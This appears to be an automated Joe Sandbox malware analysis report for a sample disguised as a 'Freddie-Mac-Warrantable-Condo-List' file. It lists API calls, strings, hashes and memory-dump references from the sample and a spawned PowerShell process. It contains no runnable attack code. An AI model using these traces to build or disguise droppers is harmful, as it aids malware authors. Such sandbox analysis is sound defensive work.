Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Process$AtomCurrentFindGlobalPropThreadWindow
String ID:
API String ID: 2582817389-0
Opcode ID: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
Instruction ID: 299b27e64c01e87a133ce8a54c99347aef86e5c58dac0e1e1101b5cceb09c5b5
Opcode Fuzzy Hash: 96014bfda2539c3c724341726d25520330f77261c7fcf234c4c7e102e9717c52
Instruction Fuzzy Hash: 09F0ECA160511166CB60BBB65C8787F5A8C9FC43907751D2BF841DA192D514CC8142FE

Uniqueness

Uniqueness Score: -1.00%

Function 006A5D88, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000008), ref: 006A5D91
OpenProcessToken.ADVAPI32(00000000,00000008), ref: 006A5D97
GetTokenInformation.ADVAPI32(00000008,00000012(TokenIntegrityLevel),00000000,00000004,00000008,00000000,00000008), ref: 006A5DB9
CloseHandle.KERNEL32(00000000,00000008,TokenIntegrityLevel,00000000,00000004,00000008,00000000,00000008), ref: 006A5DCA

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: ProcessToken$CloseCurrentHandleInformationOpen
String ID:
API String ID: 215268677-0
Opcode ID: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
Instruction ID: 606920211f29873d44d72264013709cf63daaae85b794eef22724c21b877f5a5
Opcode Fuzzy Hash: afea7f4269af62d161ed65023b08510fb3f5f5d3f19be2d10221e2fcac776304
Instruction Fuzzy Hash: 30F030716043017BD700EAB58D82EDB77DCAF45715F00482DBA98C7281DA38ED489766

Uniqueness

Uniqueness Score: -1.00%

Function 004F5548, Relevance: 6.0, APIs: 4, Instructions: 29COMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 004F5551
SelectObject.GDI32(00000000,058A00B4), ref: 004F5563
GetTextMetricsW.GDI32(00000000,?,00000000,058A00B4,00000000), ref: 004F556E
ReleaseDC.USER32 ref: 004F557F

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: MetricsObjectReleaseSelectText
String ID:
API String ID: 2013942131-0
Opcode ID: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
Instruction ID: eb0f3ac5e6ff13c2d338f041733c2278b611cd6d279531a3f0c2a93b6799ed89
Opcode Fuzzy Hash: 7f08a457e74fbd3b271c5bbe40b56a30871c5d5dda21d4d00258fc544de77888
Instruction Fuzzy Hash: 64E0DF71E029A432D61071661C82BEF2A498F823AAF08112BFF08992D1DA0CC94083FE

Uniqueness

Uniqueness Score: -1.00%

Function 006B72C2, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 68COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000097), ref: 006B7302

Strings

/INITPROCWND=$%x , xrefs: 006B7332
@, xrefs: 006B72C8

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Window
String ID: /INITPROCWND=$%x $@
API String ID: 2353593579-4169826103
Opcode ID: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
Instruction ID: aee196482ecc750f80196a5b85e8ce4b28bd470815894a77b79cec9963f5eee4
Opcode Fuzzy Hash: c5684dee33ba9897102623d205b8f12a775b2b56f0b9d91e0f24c978029d6739
Instruction Fuzzy Hash: 0721C070A083489FDB01EBA4D841FEE77F6EF89304F51447AF800E7291DA38AA45DB54

Uniqueness

Uniqueness Score: -1.00%

Function 00435608, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON

Download Yara Rule

APIs

VariantInit.OLEAUT32(FYC), ref: 00435618

Part of subcall function 0040A61C: SysReAllocStringLen.OLEAUT32(00000000,?,?), ref: 0040A636

Strings

kYC, xrefs: 00435656
FYC, xrefs: 00435614, 00435638, 0043566B, 00435617, 0043563B

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AllocInitStringVariant
String ID: FYC$kYC
API String ID: 4010818693-1629163012
Opcode ID: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
Instruction ID: 78d3457c21f8c6ae710edabf1b7f51a26e4fb704544ac86c5ed1d2f79e361521
Opcode Fuzzy Hash: 3b028a09afde62da82f47710d3d6daef9e5d11d6f2f19900e295b27d7684dbff
Instruction Fuzzy Hash: 2FF08171704608AFD700EB95CC52E9EB3F8EB4D700FA04176F604E3690DA346E04C769

Uniqueness

Uniqueness Score: -1.00%

Function 006B8CAC, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 33COMMON

Download Yara Rule

APIs

Part of subcall function 006ACE20: FreeLibrary.KERNEL32(00000000,006B8CD8,00000000,006B8CE7,?,?,?,?,?,006B97CB), ref: 006ACE36

Part of subcall function 006ACB10: GetTickCount.KERNEL32 ref: 006ACB58

Part of subcall function 00615560: SendMessageW.USER32(00000000,00000B01,00000000,00000000), ref: 0061557F

GetCurrentProcess.KERNEL32(00000001,?,?,?,?,006B97CB), ref: 006B8D01
TerminateProcess.KERNEL32(00000000,00000001,?,?,?,?,006B97CB), ref: 006B8D07

Strings

Detected restart. Removing temporary directory., xrefs: 006B8CBB

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: Process$CountCurrentFreeLibraryMessageSendTerminateTick
String ID: Detected restart. Removing temporary directory.
API String ID: 1717587489-3199836293
Opcode ID: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
Instruction ID: 85aea6856e01ecd59818c985a9c9c54c6fb1bec533a363d5825b66760217dfd7
Opcode Fuzzy Hash: b875f7f0b48f5dfd19b2ce76acc2faf3568150e367b49ea09eed803ae0a996fc
Instruction Fuzzy Hash: 38E0E5F16082446EE2417BB9FC13DA67F9FDB86764B51043BF50083542D9295C80C338

Uniqueness

Uniqueness Score: -1.00%

Function 005C86E0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 31COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilterEx,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C86FA

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Part of subcall function 005C8644: GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B

Strings

ChangeWindowMessageFilterEx, xrefs: 005C86F0
user32.dll, xrefs: 005C86F5

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: ChangeWindowMessageFilterEx$user32.dll
API String ID: 1883125708-2676053874
Opcode ID: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
Instruction ID: 33574298acf09a9ab3b8dc906f6acd80ea038e69245e9512450f7745a5549cab
Opcode Fuzzy Hash: 7df53831068b11b3bc6f85ec8e00ebaae734f643accca07e7ade5c95f0b28fc3
Instruction Fuzzy Hash: F7F0A070702610DFD715EBA9AC89F662FE6EB84345F30142EF1069B691DBB60880C699

Uniqueness

Uniqueness Score: -1.00%

Function 005C8790, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 29COMMON

Download Yara Rule

APIs

Part of subcall function 005C8820: GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonCreate,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019,?,00000000,006B80E6), ref: 005C87A8

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C87A3
ShutdownBlockReasonCreate, xrefs: 005C879E

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: HandleModule$AddressProc
String ID: ShutdownBlockReasonCreate$user32.dll
API String ID: 1883125708-2866557904
Opcode ID: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
Instruction ID: 7110eff28424d8e01fad9884693b7150e68d4fec514983f83c6ed3211673b8d3
Opcode Fuzzy Hash: 2aa4c1ecb0c25f1be1c5e6900995ae7394209ee48eb3cc3556ffc74fd539a6e1
Instruction Fuzzy Hash: E7E0C2623402212E020071FF2C85F7F08CCEDC8B6A3300C3EB200D3501EE5ACC0101AC

Uniqueness

Uniqueness Score: -1.00%

Function 005C7488, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 27COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(kernel32.dll,GetSystemWow64DirectoryW,?,0060D678,00000000,0060D74A,?,?,006D579C,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005C74A2

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

kernel32.dll, xrefs: 005C749D
GetSystemWow64DirectoryW, xrefs: 005C7498

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: GetSystemWow64DirectoryW$kernel32.dll
API String ID: 1646373207-1816364905
Opcode ID: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
Instruction ID: e1b2a1fbaeccbf4b8658dcbc551e8be6aafa7850fd628b76cf9cecd9236f8401
Opcode Fuzzy Hash: 4c32a65a860ad497678a8e71e86e44d9654e19785abb72717ae8a0dce5466f25
Instruction Fuzzy Hash: 95E0DFB07047051BDF1061FA8CC3F9A1D896BDC794F20483E3A90D66C2F9ACD9400AAA

Uniqueness

Uniqueness Score: -1.00%

Function 005C8644, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ChangeWindowMessageFilter,?,?,005C873A,?,00000004,006CCEB4,0061544A,006158C4,00615368,00000000,00000B06,00000000,00000000), ref: 005C865B

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C8656
ChangeWindowMessageFilter, xrefs: 005C8651

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ChangeWindowMessageFilter$user32.dll
API String ID: 1646373207-2498399450
Opcode ID: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
Instruction ID: f5cb7bf2fd8e9c4876a78839223762f9bc4b5f6247b358773db5c5b1cf956787
Opcode Fuzzy Hash: d5c5c43d7ea52c44e9976db0544a7561c6df8b4dd84608384c188d363e3b4acb
Instruction Fuzzy Hash: 4CE01AB4A01701DED711ABA6AC49FE93BEEE798305F20641EB246D6695CBB904C0CF94

Uniqueness

Uniqueness Score: -1.00%

Function 005C8820, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,ShutdownBlockReasonDestroy,?,?,005C879E,?,?,?,006B7DE9,0000000A,00000002,00000001,00000031,00000000,006B8019), ref: 005C882E

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 005C8829
ShutdownBlockReasonDestroy, xrefs: 005C8824

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ShutdownBlockReasonDestroy$user32.dll
API String ID: 1646373207-260599015
Opcode ID: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
Instruction ID: f0c74795214b74e90bc607b5066537e4d8d40fa8e1211c6ca3dcb32fdea7855f
Opcode Fuzzy Hash: 8427ef742386233abb3eb781771c12357b31464d3db843b592f5d6180d91b402
Instruction Fuzzy Hash: 22D0C7B37117222A651075FA3CE1FF70A8CDD95795354087EF700E2941DD55DC4111A8

Uniqueness

Uniqueness Score: -1.00%

Function 006B9800, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 9COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(user32.dll,DisableProcessWindowsGhosting,006C46BE,00000001,00000000,006C46F1,?,?,000000EC,00000000), ref: 006B980A

Part of subcall function 00414020: GetProcAddress.KERNEL32(?,?), ref: 0041404A

Strings

user32.dll, xrefs: 006B9805
DisableProcessWindowsGhosting, xrefs: 006B9800

Memory Dump Source

Source File: 00000005.00000002.312562490.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.312481358.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.356681875.00000000006C5000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356730689.00000000006C6000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.356859915.00000000006C7000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.356941218.00000000006CA000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357112752.00000000006CC000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357272029.00000000006CE000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357396210.00000000006CF000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357652099.00000000006D4000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357795607.00000000006D9000.00000008.00020000.sdmp Download File
Associated: 00000005.00000002.357891323.00000000006DB000.00000004.00020000.sdmp Download File
Associated: 00000005.00000002.357919271.00000000006DC000.00000002.00020000.sdmp Download File
Associated: 00000005.00000002.358031640.00000000006DE000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_Freddie-Mac-Warrantable-Condo-List.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: DisableProcessWindowsGhosting$user32.dll
API String ID: 1646373207-834958232
Opcode ID: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
Instruction ID: a737f6cb342469133653c2ad22e7ce718afd724c013acdac2058dbbd1ad6bbf7
Opcode Fuzzy Hash: 93f995bdab4b473a61fd02318e1a2b49a3f24fe148fe8aefdfb1ddf0f8e4a138
Instruction Fuzzy Hash: 99B092F0240331101C1072B33C02ACA080A08CBB497024C2A3720A108ADD4880C01239

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: powershell.exe PID: 5312 Parent PID: 5344 powershell.exeCOMMON

Executed Functions

Function 082674FA, Relevance: .0, Instructions: 29COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.439976348.0000000008260000.00000040.00000001.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_8260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c7bc7d284fa2ab7c266fa7250d6003f9c1130e677f79427a56f07d2aa3a8278e
Instruction ID: cd9757b539c80786acdc851bc05f613a2f92f9b35044c328b4ade0a5f06c355d
Opcode Fuzzy Hash: c7bc7d284fa2ab7c266fa7250d6003f9c1130e677f79427a56f07d2aa3a8278e
Instruction Fuzzy Hash: 91F05E75620200DBD704EBA8E58567EFBA2FB85319B60C96EE01A47744CF39E806CF81

Uniqueness

Uniqueness Score: -1.00%

Function 082648B9, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.439976348.0000000008260000.00000040.00000001.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_8260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 35affa585fc843ea5534c6ab11566352884dff2384098b26e01867cefdf435a4
Instruction ID: 1f62f6e851e5de3eb403153367e07ee4bf1d25a8c82ee1fca2921983a031dd57
Opcode Fuzzy Hash: 35affa585fc843ea5534c6ab11566352884dff2384098b26e01867cefdf435a4
Instruction Fuzzy Hash: 79E026712101009BC304EBD8E4997BD7392DBC0321F008829D01A83680CB34AC424B51

Uniqueness

Uniqueness Score: -1.00%

Function 082648FC, Relevance: .0, Instructions: 20COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.439976348.0000000008260000.00000040.00000001.sdmp, Offset: 08260000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_8260000_powershell.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 330483c2cced5c0647457f387c97f71dde08ce266f9c2fd4954174efc09e10b6
Instruction ID: f345acf5a778a3183342fba0302da10832174eb5bb12754d7d5e4424561d827b
Opcode Fuzzy Hash: 330483c2cced5c0647457f387c97f71dde08ce266f9c2fd4954174efc09e10b6
